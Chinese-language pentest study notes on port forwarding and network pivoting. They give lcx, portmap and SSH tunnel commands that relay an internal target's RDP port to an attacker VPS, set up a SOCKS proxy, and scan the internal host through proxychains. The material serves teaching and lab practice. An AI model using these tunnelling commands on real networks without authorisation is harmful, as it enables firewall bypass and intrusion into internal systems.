[TOC] ## 端口转发 **端口转发(Port forwarding)有时被叫做隧道 是安全壳(SSH) 为网络安全通信使用的一种方法** 端口转发是**转发一个网络端口从一个网络节点到另一个网络节点的行为** ## 端口转发工具—LCX **LCX** ~~~ • lcx是最为经典的端口转发工具，基于Socket套接字实现端口转发 • 有Windows和Linux两个版本，分别为lcx.exe 和 portmap ~~~ **LCX——端口转发（正向连接）** ~~~ • 将内网靶机的3389端口转发到边界机的8888端口 • 命令：lcx.exe -tran 8888 内网靶机IP 3389 • 场景：由于防火墙限制，只允许8888入站 ~~~ **LCX——端口转发（反向连接）** ~~~ • 将内网靶机的3389端口转发到攻击机的8888端口 • 攻击机（vps）：lcx.exe -listen 6666 8888 • 边界机：lcx.exe -slave 攻击机IP 6666 内网靶机IP 3389 ~~~ **portmap** ~~~ • 将内网靶机的3389端口转发到边界机的8888端口 • 命令：./portmap -m 1 -h1 127.0.0.1 -p1 8888 -h2 192.168.11.12 -p2 3389 -v ~~~ ## 端口转发工具—SSH ~~~ SSH • 内网中几乎所有Linux/UNIX服务器都支持SSH协议 • SSH协议可以对数据传输进行压缩和加密 • SSH端口隧道经常被攻击者利用 ~~~ ## SSH隧道常用参数说明 ``` -C 压缩传输，加快传输速度 -f 将SSH传输转入后台执行，不占用当前的shell -N 建立静默连接（建立了连接，但是看不到具体会话） -g 允许远程主机连接到本地用于转发的端口 -L 本地端口转发 -R 远程端口转发 -D 动态转发(socks代理) -P 指定SSH端口 ``` ## SSH端口转发示例 ~~~ SSH——本地端口转发 • 将内网靶机的3389端口转发到边界机的8888端口 • 命令：ssh –L 本地端口:目标主机:目标端口 用户名@跳板机IP • 案例：ssh -CfNg -L 8888:内网靶机IP:3389 root@127.0.0.1 SSH——远程端口转发 • 将内网靶机的3389端口转发到vps的8888端口 • 命令：ssh –R 远程主机端口:目标主机:目标主机端口 用户名@远程主机IP • 案例：ssh -CfNg -R 8888:内网靶机IP:3389 root@192.168.7.146 SSH——动态端口转发 • 当攻击机访问边界机建立正向代理，通过边界机作跳板，访问内网 • 边界机命令：ssh -CfNg -D 8888 root@192.168.7.148 • 攻击机访问内网：proxychains4 rdesktop 192.168.11.12 • nmap扫描：proxychains4 nmap -Pn -sT -n 192.168.11.12 -p 3389,80,139 ~~~